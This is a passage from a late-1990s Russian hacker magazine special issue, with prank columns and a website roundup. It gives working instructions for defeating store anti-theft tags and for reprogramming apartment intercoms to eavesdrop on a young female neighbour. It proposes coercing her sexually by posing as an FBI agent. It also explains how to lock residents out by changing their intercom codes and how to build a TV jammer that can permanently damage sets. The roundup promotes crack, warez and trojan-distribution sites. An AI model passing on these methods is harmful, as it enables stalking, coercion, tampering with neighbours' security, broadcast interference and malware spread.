Если ты честный покупатель, то когда ты тащишь книжку в кассу, там ее кладут на специальный столик. На столике поле настолько сильное, что в таблетке пробивает конденсатор, т.е. она перегорает. В резонанс она входить больше не может, и ты свободно минуешь выход. (А вот столик с генератором вреден для кассирши). Если ты разрежешь таблетку пополам лезвием бритвы, то никакого резонанса не выйдет. Еще можно экранировать таблетку, завернуть книжку в фольгу или мелкую металлическую сетку.

Но воровать книжки пошло, я этим никогда не занимаюсь и тебе не советую. Все удовольствие в том, с какой простотой можно сломать их систему защиты. И вот тут-то появляется столько возможностей здорово посмеяться! Например, отклеиваешь электронную таблетку от книжки до того, как за нее заплатишь. Смело клей таблетку на внутренний край подола юбки у какой-нибудь графоманки и угорай со смеху! Или другой способ: в летнюю жарищу, когда на тебе только майка да шорты, приклей таблетку к пятке и ходи мимо охранников с криками: «Да я честный покупатель! Да ничего у вас, ребята, не работает! Видать, сломалось ваше устройство!». Так можно весь магазин перестремать.

Мелкий пакостник

в школе и дома...

Сейчас очень популярны домоф

оны. Но вся прелесть в том, что номер квартиры программируется в самой трубке любого домофона. Развинчиваешь основание трубки, там несколько штырьков с перемычками. Под каждой перемычкой стоит цифра. Сумма цифр, на которых стоят перемычки, кодирует номер квартиры владельца трубки. Например: 4+8=12, 1+4+8+32=45. Пользуясь этим правилом, ты легко перекодируешь свою трубку на номер квартиры твоей юной соседки по подъезду. Потом с помощью диктофона можно будет записать, кто к ней приходил за день. Осталось только наплести бедной девушке, что ты — агент ФБР, знаешь все и лучше ей отдаться тебе без пререканий.

В новых домофонах у каждой квартиры есть электронный пароль, открывающий замок. Этот пароль ты можешь легко поменять как у себя, так и у соседей по подъезду. Тебе понадобится друг.

Подсмотри электронный пароль своей жертвы.

Перекодируй свой домофон на номер квартиры твоей жертвы.

Подожди, пока жертвы не будет дома.

Оставь своего друга у себя в квартире, а сам спустись к пульту домофона.

Набери номер квартиры жертвы.

Твой друг возьмет трубку.

Удерживая ключ, попроси друга нажать на ключ 3 раза.

На дисплее появится «— — -».

Введи старый код, который подсмотрел.

Введи новый.

Попроси приятеля положить трубку.

Теперь твоя жертва не сможет изменить пароль, так как уже не знает старого. В идеале можно так кинуть весь подъезд.

На панели домофона написан номер его модели, например, «RAINMANN CD-200». Такую трубку ты можешь купить в сервисцентре или на радиорынке. Припаяй шнур от нее к двум булавкам. Теперь ты можешь перепрограммировать домофон в любом подъезде. Все квартиры висят на одном проводе, идущем к домофону. Найди этот провод (он похож на телефонный), воткни в него иголки. Недоумевающим жильцам говори, что это профилактика домофона от летучих крыс и морских ежей.


Спецвыпуск хакер, номер #001, стр. 001-106-3, Искусство художественного прикалывания

Искусство художественного прикалывания

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-106-3

Культурный отдых...

Посмотрел футбол, побродил по улице, взял пару телефончиков у повстречавшихся девушек, нажрался в кал, к вечеру с друзьями, поиграл на компе... Никакой культуры отдыха! Предлагаю заняться посреди города спортивным деньголовством. Привязываешь к веревке магнит и начинаешь ловить деньги из фонтана. Притягиваются монеты достоинством в 1-у и 5 копеек, 5 рублей и толпы изумленной публики. Сейчас как раз открывается новый деньголовный сезон.

Приготовься, что к тебе подойдут люди и будут спрашивать, как улов. Иностранцы будут фотографировать тебя на безопасном расстоянии. К нам с другом на Неглинке подошли два рабочих:

— Что, осветители нам бьете? (свирепым голосом)

— Да нет, дядя! Мы фонтан вам от ржавчины чистим (дружелюбно).

— Сейчас пойдете в обезьянник, вольеры ментовским собакам чистить! (брызгая слюной).

Самым разумным было удалиться.

Магнит можно добыть так: идешь на помойку, находишь там старый телевизор. Раскурочь его арматурой или другими подручными средствами. Извлеки динамик. Несколько раз брось динамик об асфальт, чтобы отвалился магнит. Осталось его прочно обвязать веревкой.

И наши глаза

встретились...

Новейшим достижением космического приборостроения стал противогаз со светящимися глазами. Если бы не моя муза Света, он бы так и остался «на бумаге».

Вхожу в троллейбус. На мне противогаз, в руке пульт дистанционного управления глазами. Сверху надет капюшон. Подхожу к кабине водителя. Его видно в зеркальце. Наши глаза встречаются в зеркальце. Глаза у меня светятся. Водитель бледнеет и резко оборачивается, но я успевая раствориться в воздухе...

Как-то я зашел в крутую парикмахерскую. Стал гладить резиновый затылок, мычать и моргать лампочками в глазах. Те, кого не увезли в реанимацию, долго пытались меня понять: думали, что заблудился на чужой планете. Потом пригрозили вызвать космическую милицию, и я с диким воплем, натыкаясь на углы, покинул помещение.

Сделать противогаз просто. Тебе понадобится:

Противогаз без фильтра.

2 лампочки от карманного фонаря.

Батарейка крона 9 вольт.

Мягкий тумблер и реостат (регулируемое сопротивление) на 1.5 килом (продают на лотках вместе со всякими видео, аудиошнурами).

1.5 метра кабеля телевизионной антенны (можно заменить другим проводом).

Спичечный коробок.

Тонкий картон, фольга, клей, скотч.

Паяльник (необязательно).

Руки (обязательно).

Батарейку воткни в нос противогаза. Она там как раз очень плотно встанет. К ней на тонких проводочках припаяй или примотай скотчем лампочки. Сами лампочки приклей к глазам противогаза. Из картона вырежи два бублика, к ним приклей фольгу — получились отражатели. Отражатели приклей скотчем поверх лампочек. Отражатели должны быть такими, чтобы твоих глаз не было видно. Будет казаться, что внутри противогаза пусто.

В спичечном коробке помести тумбле

р и реостат. Коробок и противогаз будет соединять антенный кабель. Его удобно продеть в рукав куртки, а коробок взять в руку. Можно включать и отключать глаза, регулировать их яркость реостатом.


Спецвыпуск хакер, номер #001, стр. 001-106-4, Искусство художественного прикалывания

Искусство художественного прикалывания

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-106-4

Соедини все по схеме. В коробок для прочности набей остатки картона и замотай его скотчем.

В путь...

Мы все — разные люди. Нам интересны разные вещи. Но в каждой области есть то, что весело и понятно всем. Общее дело здорово объединяет даже самых разных людей (так и случаются революции). Не комплексуй, не бойся показаться несерьезным, не бойся фантазировать.

Сейчас время реализации твоих самых невероятных идей. Устроим революцию, возьмем штурмом мировое занудство...

Изобретай, фантазируй, но постарайся не попасть в милицию. Успехов!


Спецвыпуск хакер, номер #001, стр. 001-109-1, Как нагадить соседу, заглушить чемпионат по футболу

Как нагадить соседу, заглушить чемпионат по футболу

Доктор Прозвонкин

Спецвыпуск хакер, номер #001, стр. 001-109-1

Нравится мне делать гадости. Ну нравится! И ничего с собой поделать не могу. А самое главное, что я уже настолько привык гадить всем подряд, что часто эти самые гадости вылезают из меня абсолютно автономно от моего сознания. Вечер... Сижу себе тихонечно в комнате, паяю... Думаю а не собрать ли мне собственный передатчик квази-излучения, чтоб общаться с другими цивилизациями? Только пару контактиков припаял — влетает сосед с дикими воплями: «Вован! У тебя телевизор работает?». А чёрт его знает, работает он или нет, я из телевизора уже давно себе сканер собрал. Оказалось, что у всех моих соседей отрубились телеки. А причиной всему оказался тот маленький приборчик, который я даже собрать толком не успел. Я не буду рассказывать тебе о том, как меня били ногами все женщины моего подъезда за пропущенную серию «Санта Барбары», а мужики за «Формулу 1». Лучше я расскажу тебе о самой «дъявольской машинке».

Описание прибора

Маленькое устройство, умещается на ладони. На кнопочку нажмешь и телевизоры вокруг шипят. Сволочи! Выгнали меня из фирменного магазина SONY! Полезнейшая вещь для студентов, если ты готовишься к экзамену, а твой придурок-сосед на всю катушку врубил чемпионат мира по футболу, то вот тут-то ты на кнопочку и надавишь.

Принципиальная схема

Сделать это просто. Купи батарейку 4,5 вольта, другая не подходит! Купи в Митьке микросхему 155 ЛА 3 (она стоит рубля 3), и маленький переключатель (кнопку, микрик, тумблер, что более по душе). Этих трех деталей достаточно! Спаяй внимательно схему, кнопка ставится на питание микросхемы. Паяльник на ножке микросхемы более 2-х секунд лучше не держать. Микросхему и кнопку прикрути к батарейке скотчем. Петля и антенна должны болтаться снаружи.

Руководство

по эксплуатации

Теперь включи телек на второй канал и жми на кнопку. Лучше всего глушатся РТР, МузТв, Столица, СТС, 31, Ren TV. Иногда нужно поводить прибором в пространстве. Симптомы бывают самые разные: полосы всех мастей и размеров, изменение цвета, шипение, дерганье экрана. Если найти правильную точку в пространстве, то канал срывается вовсе. Чтобы тебя не заметили, прибор клади в карман штанов, а провода засовывай под свитер/рубашку.

Памятка потребителю

Если хочешь глушить телевизоры во всем доме, то минус батарейки прислони к батарее отопления! Помни, что бывают (редко, конечно) телевизоры с внешним усилителем и с хорошей, дважды экранированной антенной — на них помехи действуют плохо. Провода должны висеть на некотором удалении от устройства, т.е. если ты их обмотаешь вокруг устройства, ничего работать не будет.

Противопоказания

Цифровые телевизоры могут необратимо портиться, т.е. полосы могут остаться навечно. Компьютерный TV-tuner ПРОСТО ПЕРЕГОРАЕТ!!! У некоторых чувствительных людей от прибора начинает болеть голова и расти волосы на языке. Длительное применение не рекомендуется. Прибор используется в лабораториях NASA для зомбирования личностей, подобных тебе. Поэтому рекомендуется полчаса постоять под окном твоей благоверной, усиленно давя на пимпу устройства, а потом явится к ней и прямо сказать: «Где ты была с 9 до 11, 8 июля 1862 года???». Девушка не сможет сопротивляться и выложит тебе всю правду.


Спецвыпуск хакер, номер #001, стр. 001-109-2, Как нагадить соседу, заглушить чемпионат по футболу

Как нагадить соседу, заглушить чемпионат по футболу

Доктор Прозвонкин

Спецвыпуск хакер, номер #001, стр. 001-109-2

Прости, больше рассказывать не могу, мне стучат дубинкой в дверь:

«Откройте!!! Милиция!!!»...


Спецвыпуск хакер, номер #001, стр. 001-110-1, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-1

Креки, серийные номера, линки... Разве не это ты ищешь, когда устанавливаешь какую-нибудь шароварную прогу? Лично меня всё время сильно бесит куча рекламы, предлагаемая «в нагрузку». Причём обычно это всякие голимые порно-сайты и похожая лабудень. Но есть, есть ещё на просторах хакерства и вареза люди, которые понимают, что не нужно впаривать людям рекламу, а надо дать только одно — долгожданный код или крек. Этого человека зовут Зомби, а страничка его находится по адресу: http://194.87.173.36/crack/

Качай на здоровье!

В начале зимы появился новый проект компании Paragraph и Infoart - виртуальное пространство Islands (http://islands.paragraph.ru/). Сама технология разработана компанией Paragraph и выглядит очень привлекательно. Программа-клиент представляет собой универсальный браузер трехмерных миров и чат, а именно ты получаешь возможность общаться с другими юзерами в виртуальных трехмерных сценах, управлять 3D-объектами в многопользовательском режиме, чатиться, просматривать Web-сайты, в том числе и трехмерные, загружать и просматривать трехмерные сцены и объекты. В настоящий момент доступно два мира — Кремль и Stenford. Очень впечатляют возможности клиента. Например он поддерживает инверсную кинематику, рендеринг в высоком цветовом разрешении, трехмерные аватары.

И при этом говорят, что достаточно 486DX100 ...

А не хотите ли, барин, отхватить себе 6 соток на Луне????

Побаловать себя картошечкой, полчаса назад выкопанной из Лунного грунта, или попить винца, сделанного из отборного винограда, выращенного на твоей лунной плантации. Для лунатиков: www.moonshop.com. Здесь, за вполне умеренную плату, ты сможешь оторвать себе кусок Луны соток эдак в шесть или больше в частную собственность, и ездить туда на каникулы загорать (но это, правда, не скоро — поезда туда, кажется,

еще не ходят).

Как хочется слушать то, что тебе нравится, а не то, что тебе навязывают. Все, наверное, знают про такой формат аудио-файлов, как MP3, и либо слышали, либо читали о бесчисленных спорах, судах и тому подобных нареканиях в адрес этого чудесного «изобретения». Не будем уподобляться критикам этого стандарта, просто им надо, наконец, понять, что прогресс на месте не стоит, изобретается что-то новое, причем постоянно. Короче, друг мой, если ты хочешь качнуть что-нибудь, что любишь именно ты, а покупать CD-юк тебе «в падлу», то иди-ка ты на... http://mp3station.da.ru. Там тебе выдадут по первому требованию хит-парады MTV Top 20, American Billboard и Radio Maximum в формате MP3. Или шагай на http://mp3.magicom.ru/, где настолько большой архив российской и буржуйской музыки, что я постоянно им пользуюсь.

Эх, ну и любят же юзеры делать гадости друг другу! Поуправлять удалённо например чей-нибудь компьютер. Для этого был написан не один десяток программ. Одни умеют только выдвигать «подставку под кофе» и показывать на удаленном компьютере задницу Била Гейтса, а другие могут... все. И вот, чтобы облегчить изучение уже написанных программ такого рода и в какой-то степени обезопасить свою «подставку» от несанкционированных выдвиганий и был создан сайт — http://members.xoom.com


Спецвыпуск хакер, номер #001, стр. 001-110-2, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-2

/ProcionSoft. Там, ты сможешь не экспериментируя на своем ... здоровье, узнать о самых известных творениях в этой области.

Black Fire Pandemonium

http://warrax.df.ru

Сатанизм с «человеческим лицом»

«При слове «Сатанист» многие сразу представляют себе мрачную личность, занимающуюся поджогом церквей и раскопкой могил в свободное от жертвоприношений время. Редкие свободные минуты уделяются сексуальным оргиям», — пишет Warrax, Church Of Lucifer member. И он просит не путать настоящих Сатанистов с дьяволопоклонниками, наделенными неустойчивой психикой и поклоняющимися Князю Тьмы в его «антропоморфном» проявлении.

«Как это ни парадоксально, — поясняет он, — но истинные Сатанисты НЕ ВЕРЯТ в Сатану. Точнее, они не верят в дьявола, черта или другой персонаж библейских сказок. Не существует персонажа с рогами, копытами, хвостом, пахнущего серой и таскающего за собой толстый портфель, набитый контрактами покупки душ, подписанных кровью».

Warrax на своем сайте «Black Fire Pandemonium» предлагает всем желающим ознакомиться с «Сатанинской Библией», «Записной книжкой Дьявола» и тому подобной литературой и сделать свои собственные заключения по данному вопросу.

Стоит предупредить, что тексты написаны профессионально, и зачастую ты будешь ловить себя на мысли, что живешь, оказывается, согласно принципам Сатанизма... Поэтому, если ты не уверен в стойкости своего характера и своей способности критически оценивать прочитанное, то есть вещи, которые лучше и не пробовать.

Хотя Истина, она, по прежнему, «где-то там», и кто знает, может быть, на том свете черти будут добавлять в ваш котел с кипящим маслом перец и лавровый лист... как «своему»! ;-)

Аська — моя любимая девушка. Я уделяю ей времени намного больше, чем другим подругам. Я про ICQ, а ты что подумал? :) Существует только один облом: всегда хочется увидеть, с кем же это ты разговариваешь, особенно, если это девушка (для некоторых, особенно если молодой человек :)). Вот и Семён Будённый тоже так думал, думал, а потом ему надоело думать, и он создал сайт российских пользователей ICQ и стал там публиковать их фотографии. И сайт стал пользоваться такой популярностью, что со временем переполз с домашней странички на домен второго уровня — www.icq

foto.ru. Правда, раньше мне сайт нравился больше — работал быстрее. А сейчас немного притормаживает (а иногда и не немного), может, от того, что народ уж слишком его любит.

И чем только народ не увлекается!!! Кто всякими там кошечками и цветочками (фу, гадость какая!), а кто машинами, раздолбанными всмятку. Ты фильм «Автокатастрофа» смотрел? Помнишь, там парень со своей подругой обожал любовью позаниматься во время или после аварии? И вообще, любил он всяких девушек с переломанными ногами и т.п. Ну здесь, конечно, всё не так, но посмотреть в галерее на битые автомобили можно. Зайди на www.0pel.com, и всё там увидишь. (0 — это не О, а ноль)

Короче, баклан! Ты типа там на пимпу на своём мышаке надави и типа заваливай типа к нам в гости на www.beavis-butthead.ru. Это круто, пельмень! Все остальные сайты — дерьмо, а наш — полный крутняк. Мы тут это... того... ну типа картинки тебе выложили, всякие видеоролики и остальную дрянь типа mp3 и waw’ов всяких. Короче, баклан, ты чё про Бивиса и Батхеда не слышал? Ты чё, MTV не смотришь? www.beavis-butthead.ru


Спецвыпуск хакер, номер #001, стр. 001-110-3, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-3

Баб кадрить!!! И немедленно!!!.

Хочешь? Тогда переползай на www.love.sp.ru. Отличный сайт, особенно учитывая «Быстрый поиск любимого»... Да-да-да, именно такие службы там работают, которые позволят Вам в короткий срок найти кого-нибудь, зачем-нибудь и т.д. Можно и початиться, и «фото дня» посмотреть, и гороскоп и... вообщем, заходи и смотри сам. Вперёд, Ромео!

Fuck you! Ой, то есть Fuck.RU. Это сайтик тут такой появился. И не надо губки-то раскатывать! Иди губозакатывательную машинку купи. Никаких девочек в 2175-й позе, никаких групповушек и тому подобного ты здесь не найдёшь. Всё серьёзно, поучительно, мрачно и консервативно. Короче, «Новости из-под земли», как они себя называют. Ты можешь початиться в матерном чате под лозунгом «Здесь есть мат, мать его!». Или просто почитать статейки о сетевой жизни, где матерных слов намного больше, чем обыкновенных. Вобщем если мат — твой родной язык, то на www.fuck.ru тебе переводчик не понадобится.

Мир через призму

Интернет

http://www.verhey.ite.cv.ua/cameras.htm

Это, наверно, забавно — из того мира взглянуть на этот...

Все! Как поется в одной песне, «наши времена настали!», и теперь на каверзный вопрос, заданный с ехидством и чувством собственного превосходства и звучащий примерно так: «Вы не были на Таити?», ты можешь с ленцой в голосе отвечать: «А чего я там не видел? Дикое, наверно, место! А во Франции я был, и в Гонконге был, да и всего пару дней назад по Штатам шатался. Говорят, там люди другие! Так я тебе скажу — вранье. Что у нас что у них! Зашел я как-то вечером на территорию одного из их университетских городков, а поздно уже было, так там трое четвертому идти помогали, да так неумело, что раз пять вместе с ним вместе падали». И пусть тот товарищ жалобно лепечет, что, дескать, на Таити тоже неплохо. Тебе останется только пару раз презрительно хмыкнуть, и от его самомнения следа не останется!

Приврать, конечно, придется, но, в принципе, данный диалог возможен, если ты «путешествуешь» благодаря множеству Web-видеокамер, расположенных в разных уголках мира. Достаточно щелкнуть указателем мыши на карте, расположенной на странице «Мир через призму Интернет», и ты переместишься в нужную точку земного шара.

Фактически, карта — набор хорошо структурированных ссылок на соответствующие ресурсы Internet. На территориях США, Европы и Японии много видеокамер, поэтому эти территории обозначены прямоугольниками. При щелчке на них открываются более подробные карты этих мест.

Некоторыми из видеокамер можно управлять: поворачивать, масштабировать картинку. Есть камеры, которые посылают видеофайлы в форматах Real Video, *.avi, остальные пересылают обновляющиеся через некоторое время (от 10 секунд до нескольких десятков минут) картинки в форматах *.gif, *.jpg. Так что даже те, кто имеет не самые быстрые модемы и отличную связь, смогут насладиться виртуальными путешествиями.


Спецвыпуск хакер, номер #001, стр. 001-110-4, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-4

Даже тапочки можно не снимать!

AstaLaVista

http://astalavista.box.sk/

Дайте мне, пожалуйста, вон тот crack-ер...

Трудно заниматься стоматологией, используя только дрель, молоток и зубило. Еще труднее заниматься поиском crack’а к любимой программе, используя www.altavista.com в качестве поставщика сведений. Трудно, но можно. Так что если ты привык прошибать стены головой и играть в Quake на клавиатуре, то тебе стоит пропустить этот материал. А остальные могут узнать о том, как важно выбирать для каждого дела подходящий инструмент.

Универсальные системы, такие как Yahoo или AltaVista, могут порой снабдить таким количеством ссылок на документы, некоторые из которых и отношения не имеют к интересующей тебя теме (теперь это называется интеллектуальным поиском... :) ), что порой возникает мысль, что они просто пытаются произвести впечатление размерами своих баз данных. Поэтому если ты знаешь, какой предметной области соответствует твой запрос, то попробуй найти специализированную систему, которая осуществляет поиск именно в этой области.

Поиск таких систем можно начать, например, отсюда:

http://members.xoom.com/arhimed/ssearch.htm

http://www.moris.rosmail.com/references/special.htm

А если предметной

областью твоих изысканий является поиск crack’ов и серийных номеров, то отныне поручай эту работу AstaLaVista’е. С вероятностью 90% ты найдешь то, что нужно.

Интердама

http://www.interdama.com/

Как много файлов GIF хороших, как много ласковых имен...

Этот сайт предназначен для тех, кого вопросы религии и философии занимают мало, поскольку сфера их жизненных интересов приходится на другие области. «Интердаму» стоит взять на заметку всем тем, кто, заходя на поисковый сервер, вводит три заветных слова: sex, porno, hardcore и ищет, где бы туда пролезть нахаляву.

Наш человек, решивший собственными глазами убедиться в том, что Интернет задыхается под гнетом порнографии, через некоторое время с удивлением обнаруживает, что под этим гнетом задыхаются в основном «буржуины», которым кредитная карточка позволяет смело жать на надпись «Members only». Вот и мыкается он, наш горемычный, среди этих красот и прелестей, выискивая места, где создатели сайтов идут навстречу его желаниям и не требуют оплатить его «души прекрасные порывы» такой низменной и мерзкой вещью, как доллар.

Когда ты, дорогой наш читатель, станешь настоящим хакером, то объявления «Members only» уже не смогут тебя остановить. А пока не огорчайся, есть человек, который принял твои заботы, как свои собственные, и тратит день и ночь в поисках мест, где sex, erotica и porno выдаются абсолютно бесплатно!

И еще, так и быть, открою я тебе «Большую и Страшную Тайну»: если ты, как и я, подключаешься к Интернету с помощью модема, то наибольшее удовольствие ты будешь получать, глядя, как мед-лен-но грузится очередная картинка.


Спецвыпуск хакер, номер #001, стр. 001-110-5, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-5

Rothmans Adrenalin

http://www.adrenalin.ru

Для тех, кого за...

Рано или поздно, когда твои глаза начинают слезиться, в голове слышится мерный бой колокола, а поход на кухню за чашкой чая сопровождается сопением и отдышкой, ты начинаешь понимать, что пребывание в мире виртуальном сокращает в реальном мире отмеренный тебе срок. И ты ищешь занятие, которое позволит тебе в реальном мире получать свою порцию адреналина, не включая компьютер.

Заботясь о твоем здоровье, я постараюсь сократить время твоих бренных поисков и подскажу тебе место, где ты сможешь узнать о том, как другие заставляют свои мышцы работать, а голову думать — это электронная версия журнала «Rothmans Adrenalin» на русском языке. Название журнала говорит само за себя. Так же, как и названия статей: «Байк-монгольфьер», «Регата в пустыне», «Skateboard in Russia», «Основной инстинкт водолаза», «Третий закон Ньютона для мотоциклов» и т.д.

В разделе для пессимистов можно узнать, как ведут себя старые травмы и как оказать первую помощь при переломе.

На сервере в данный момент представлены четыре номера за 1998 год, и я искренне надеюсь, что к тому времени, как я их прочитаю, там появится что-то новое.

А дальше...Все в этой жизни стоит денег, но я думаю, что если уменьшить расходы на провайдера, то на прыжок с парашютом или на пару лыж нам хватит. Или может... что там пьют самые знаменитые сноубордисты?!!

Security On The Net

http://qwerty.nanko.ru/security/

—Hackай! —Не hackается. —Hackай, я тебе говорю...

Если ты ползаешь по Интернету, втайне мечтая о том времени, когда Кевин Митник будет брать у тебя автограф, и до сих пор не дополз до сайта «Security On The Net», то пора тебе сменить ползалку. Мне, вообще, обидно, что мой порядковый номер по Ramblerу был 2348, поскольку это число не является объективной оценкой труду, затраченному на создание и поддержание данного сервера. Так что не спи, а пока твой модем пытается дозвониться до ТВОЕГО (если судить по уплаченным за него деньгам) провайдера, я постараюсь подогреть интерес описаниями всех тех прелестей, которые ты сможешь там обнаружить... Итак:

На страницах «Security On The Net» можно почитать о том, что можно сделать с компьютером через Интернет (с примерами...), о проблемах и ошибках в операционных системах, узнать подробно о снифферах или о путях обхода Firewalls, просмотреть подборку компьютерного криминала.

Начинающий хакер должен ознакомиться со статьей «Как стать nethacker’om» в «чисто русском» разделе «FAQs, links & tools». И коль после чтения всех этих ужасов интерес к хакерству не остыл, то весь этот раздел нужно переписать к себе на винчестер и затвердить, как строевой устав.

Зацепило? Нет?!! Зря! Даже для человека, не видящего особой радости в возне с софтом и «железками», будет полезно узнать, насколько защищен его Email, DialUp или ICQ.

Бесконечный

Клик

http://vital.keytown.com

/clicking.htm

Этот адресок вместе со своей резолюцией «Описать» подкинул мне самый главный редактор X. Поскольку сделал он это, воспользовавшись услугами электронной почты, то я не берусь судить, было ли у него при отправке письма какое-нибудь особенное выражение лица или нет. Меня терзают смутные сомнения, что что-то такое было... Сразу заявлю, что эта страничка представляет собой один большой прикол, в сущность которого я вдаваться не буду. Не буду, и все! Нет, я, конечно, понимаю, автор и читатель — братья на-


Спецвыпуск хакер, номер #001, стр. 001-110-6, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-6

век, и все такое... Но поскольку я сам посетил это место без сопроводительной документации, то я считаю, что имею полное право отыграться. А вам просто не повезло — попались под горячую руку.

P.S. Если эта страничка не исчезнет или не переедет к тому моменту, когда журнал попадет к вам в руки, то и вы, злобно ухмыляясь, начнете рассылать письма своим друзьям со словами: «Я тут вчера был на http://vital.keytown.com/clicking.htm — на это стоит посмотреть!». Никто не хочет быть последним в цепочке...

Official Page Of Distributors

«Trojan Horse» Stealth

http://xakep.superbest.net

Как я и предполагал, KurT и Doc, создатели троянского коня Stealth, (см. Х № 2, статья «Как стать рабовладельцем в сети»), на своем сайте обошли стороной мирные увлечения, поэтому здесь нет уроков вышивания крестиком или же советов по созданию композиций из цветов по законам икебаны. Зато здесь можно ознакомиться со специфической подборкой программ, в которую входят декомпиляторы, шестнадцатеричные редакторы и редакторы ресурсов, крякеры паролей к ZIP/ARJ/RAR/AIN-архивам, нюки, троянские кони (во главе с их собственным любимым детищем) и другие более или менее «вредоносные» проги. Насколько я могу судить, все программы отобраны тщательно и с любовью, а некоторые из них настолько «ужасны», что авторы сайта рекомендуют использовать их «только в образовательных целях». :)

Кроме того, на сайте можно получить полное описание работы со Stealth, почитать о способах «хакнуть форточки» и ознакомиться с несколькими интересными исходниками.

В общем, заходи, получай полный комплект «хакера-надомника» и учись, учись, учись, как завещал великий Хакер.

А пока же, как мне известно, KurT и Doc пьют пиво Miller и обещают порадовать всех новой версией Stealth. Ждем-с!

«Free Award Icons Library»

http://mir.glasnet.ru/~awicon/index.html

«Ничто так не красит человека, как полная грудь орденов!»— гласит народная мудрость. Вы удивитесь, но к почетному делу сайтостроения эта пословица также имеет прямое отношение. Ну, как иначе объяснить то, что некоторые сайты из маленьких и незаметных превращаются в большие и важные? И не говорите мне, что из-за того, что их создатели не спали и не ели, отдавая все силы своему любимому детищу — это просто смешно! Вы ведь тоже, создавая свою страничку, не спали и не ели, несмотря на то, что догадаться об этом по вашему внешнему виду довольно трудно! И обновляется ваша страничка тоже регулярно. Что значит, нет?!! А кто пару месяцев назад добавил к своей автобиографии фотографию любимого пса Тузика?!! То-то же! Не, народ, дело не в этом, а в том, что все эти сайты в свое время очень удачно получили награды-титулы, сообщавшие всем желающим, что это «Сайт Года», «Пуп Земли» или, на худой конец — «Best viewed with Netscape Navigator»


Спецвыпуск хакер, номер #001, стр. 001-110-7, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-7

Быстро и просто, не участвуя во всех этих дурацких конкурсах, раздобыть себе веселую награду-иконку можно в «Free Award Icons Library». Здесь можно выбрать себе подходящую награду из целой Библиотеки наград или же вставить в вашу страницу специальный кусок кода, и тогда она всегда будет украшена наиболее популярной на сегодня наградой с этого сайта.

Для очень жадных открылась еще и Библиотека Баннеров.

BRAVA Common Sites, Inc

http://www.bratok.com/

Если ты с утра бежишь на улицу, чтобы купить какой-нибудь «Криминальный Листок» и доставить себе радость, читая о новых грабежах, убийствах и криминальных разборках, то BRATVA Common Sites — не для тебя. Этот сайт не для суетливых. А вот «реальные мужики» могут найти здесь много интересного.

Помимо материалов, посвященных как русской мафии, так и мафии других стран, здесь можно найти информацию о «Ворах в законе», приведены очень дельные в определенном смысле «Советы за жизнь» из личного опыта автора сайта. Существует также любопытный раздел «Новые Русские», посетив который, я осознал, что мои возможности в построении изощренных трехэтажных ругательных выражений, именуемых по-простому «трехэтажным матом», находятся в зачаточном состоянии.

Разделы «Блатной словарь» и «Татуировки» заполнят оставшиеся пробелы в ваших знаниях о криминальном мире, после чего можно будет расслабиться под песни Александра Новикова, записанные в RealAudio.

О характере информации, помещенной на BRATVA Common Sites, создатели заявляют так: «Наш вебсайт НЕ пропагандирует преступность, как некоторые считают, он предоставляет различную информацию, из разных источников и с разных точек зрения, чтобы дать возможность вам посмотреть на предмет со всех сторон».

Остается только добавить, что это «Чисто Русский Проект», и авторы с гордостью демонстрируют, что порой у них бывают гости из правительств США, России и других стран.

Moscow CyberPunk Club

www.cyberpunk.ru

Moscow CyberPunk Club мне показался знакомым, понятным и почти что родным. Это не просто сайт — это виртуальный город, жители которого между собой называют его просто FreeСити. В этом городе есть своя библиотека, кинотеатр, свое телевидение и даже... свой публичный дом (хотя, честно вам признаюсь, посещение оного несколько остудило мое желание немедленно строить будущее именно так, как понимают его киберпанки. :) ). Побродив по улицам FreeСити, я разыскал одного из «отцов-основателей», который хотя и заявил мне, что «главного идеолога YuH’а сейчас в онлайне нету!!», но, тем не менее, поведал мне, что:

— Проект «Moscow CyberPunk Club» — это клуб друзей, чья цель состоит в том, чтобы создавать, поддерживать и продвигать субкультуру киберпанка, научную фантастику киберпанка и общую киберкультуру.

— Пока наш виртуальный город — это просто мечта (не радужная мечта, а просто — мечта). Созданный потому, что у нас, жителей FreeСити, есть подозрение, что лет через ...дцать окружающая нас реальность будет выглядеть именно так. FreeСити — просто город будущего, в котором живут люди :-) и который растет, перестраивается, в котором фактически нет другого общения, кроме как Cyber.


Спецвыпуск хакер, номер #001, стр. 001-110-8, WWW

WWW

Спецвыпуск хакер, номер #001, стр. 001-110-8

От себя добавлю, что этот сервер приглашает людей, которые интересуются киберпанком и хотят сами сделать что-нибудь в этом направлении. Так что, возможно, на улицах FreeСити появится и твой дом. Только... ради Бога! Не надо для этого выбривать половину волос и красить оставшиеся во все цвета радуги.

Arachnia’s Den of the Deceived

http://www.arachnia.com/welcome.htm

Когда вам надоест смеяться и захочется крови, мяса и оживших покойников, то для этого не нужно идти ночью в лес и гадить на могилу с разбитым надгробием. Мы все-таки не в шестнадцатом веке живем и можем «немного попугать себя до смерти», и не вылезая из уютного кресла, имея под рукой любимое одеяло в качестве надежного защитного средства от потусторонних ужасов.

Если вы хотите пугать себя качественно (на себе, единственном, экономить нельзя), а после обменяться впечатлениями с такими же, как вы, любителями просыпаться по ночам в холодном поту от собственного крика, то вам понадобится хороший путеводитель в мир ужасов.

Лично я выбираю... Arachnia’s Den of the Deceived, что и вам советую. Ресурс это довольно известный в определенных кругах, и он послужит вам прекрасной отправной точкой в ваших издевательствах над собственной психикой.

Помимо великолепной и стиль

ной графики сайт содержит рецензии на фильмы ужасов и на сайты, посвященные этим фильмам, ужасным историям и очень страшным графическим работам. Страшным с хорошей точки зрения. Arachnia’s Den of the Deceived может выдать вам награду, если ваш сайт ужасный и сексуальный одновременно, посоветовать обратиться к психиатру, если вы уже приготовили бензопилу для коллег по работе, и предложит расслабить свой мозг, поучаствовав в гипертекстовом романе ужасов (разумеется, с картинками — куда же без них).

«Groovy!»— как говорил один персонаж, в честь которого я и взял свой ник.

Массовик-затейник

http://if-site.com/_xdays/

